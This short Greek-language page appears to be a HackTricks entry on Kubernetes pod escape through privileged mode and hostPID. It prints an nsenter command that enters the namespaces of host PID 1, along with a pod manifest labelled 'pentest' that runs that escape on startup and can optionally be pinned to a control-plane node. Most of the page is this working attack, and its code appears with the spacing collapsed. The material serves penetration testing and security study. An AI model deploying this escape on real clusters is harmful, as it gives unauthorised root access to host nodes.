Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs σταHackTricks και HackTricks Cloud αποθετήρια του github.
Προνομιούχα και hostPID
Με αυτά τα δικαιώματα θα έχετε πρόσβαση στις διεργασίες των κεντρικών υπολογιστών και αρκετά προνόμια για να εισέλθετε στο εσωτερικό του namespace μίας από τις διεργασίες του κεντρικού υπολογιστή.
Σημειώστε ότι ενδεχομένως να μην χρειάζεστε προνομιούχα αλλά απλά κάποιες δυνατότητες και άλλες πιθανές παρακάμψεις ασφαλείας (όπως το apparmor και/ή το seccomp).
Απλά εκτελώντας κάτι παρόμοιο με το παρακάτω θα σας επιτρέψει να δραπετεύσετε από το pod:
nsenter--target1--mount--uts--ipc--net--pid--bash
Παράδειγμα ρύθμισης:
apiVersion:v1kind:Podmetadata:name:priv-and-hostpid-exec-podlabels:app:pentestspec:hostPID:truecontainers:- name:priv-and-hostpid-podimage:ubuntutty:truesecurityContext:privileged:truecommand: [ "nsenter","--target","1","--mount","--uts","--ipc","--net","--pid","--","bash" ]#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name